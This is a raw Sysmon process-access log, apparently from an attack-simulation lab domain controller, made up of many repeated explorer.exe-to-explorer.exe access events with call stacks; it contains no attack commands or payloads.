16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 